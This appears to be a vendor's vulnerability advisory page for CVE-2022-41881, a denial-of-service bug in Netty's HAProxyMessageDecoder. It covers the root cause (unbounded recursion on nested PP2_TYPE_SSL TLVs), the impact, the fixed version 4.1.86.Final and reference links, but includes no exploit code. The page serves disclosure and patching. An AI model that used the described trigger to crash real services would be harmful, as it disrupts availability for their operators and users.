CVE-2022-41881
Denial of Service (DoS) vulnerability in netty-codec-haproxy (Maven)
What is CVE-2022-41881 About?
This vulnerability is a Denial of Service (DoS) in Netty's HAProxyMessageDecoder, caused by an infinite recursion when parsing a malformed crafted message. It can lead to application termination due to a StackOverflowError, making it a high-impact DoS vulnerability. Exploitation involves crafting a specific message, which is relatively easy.
Affected Software
Technical Details
A StackOverflowError can be raised in Netty's HAProxyMessageDecoder when parsing a malformed crafted message due to an infinite recursion. This occurs when a TLV (Type-Length-Value) with type = PP2_TYPE_SSL is parsed, and its value is itself another TLV with type = PP2_TYPE_SSL, and so forth. While the TLV length is limited to 0xffff, a sufficiently large nesting level will trigger a StackOverflowError. If the HAProxyMessageDecoder is used directly without Netty’s ChannelPipeline, this unhandled exception will lead to an application crash, resulting in a denial of service. The recursive parsing logic of nested TLVs without sufficient depth checks is the root cause.
What is the Impact of CVE-2022-41881?
Successful exploitation may allow attackers to terminate the application, leading to a denial of service and disrupting the availability of the affected system.
What is the Exploitability of CVE-2022-41881?
Exploitation involves crafting a malformed message that triggers an infinite recursion during parsing. The attack is remote, requiring no authentication or special privileges, making it accessible to any attacker who can send a message to the affected service. The complexity of crafting the message is low to moderate. The likelihood of exploitation increases in environments where input validation is not robust, and specifically if the HAProxyMessageDecoder is used outside of Netty's ChannelPipeline.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| No known exploits | ||
What are the Available Fixes for CVE-2022-41881?
Available Upgrade Options
- io.netty:netty-codec-haproxy
- <4.1.86.Final → Upgrade to 4.1.86.Final
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://nvd.nist.gov/vuln/detail/CVE-2022-41881
- https://github.com/netty/netty
- https://github.com/netty/netty/security/advisories/GHSA-fx2c-96vj-985v
- https://github.com/netty/netty/security/advisories/GHSA-fx2c-96vj-985v
- https://security.netapp.com/advisory/ntap-20230113-0004
- https://www.debian.org/security/2023/dsa-5316
- https://osv.dev/vulnerability/GHSA-fx2c-96vj-985v
- https://www.debian.org/security/2023/dsa-5316
- https://security.netapp.com/advisory/ntap-20230113-0004/
- https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html
What are Similar Vulnerabilities to CVE-2022-41881?
Similar Vulnerabilities: CVE-2022-41966 , CVE-2017-7521 , CVE-2019-12086 , CVE-2020-10687 , CVE-2021-44228
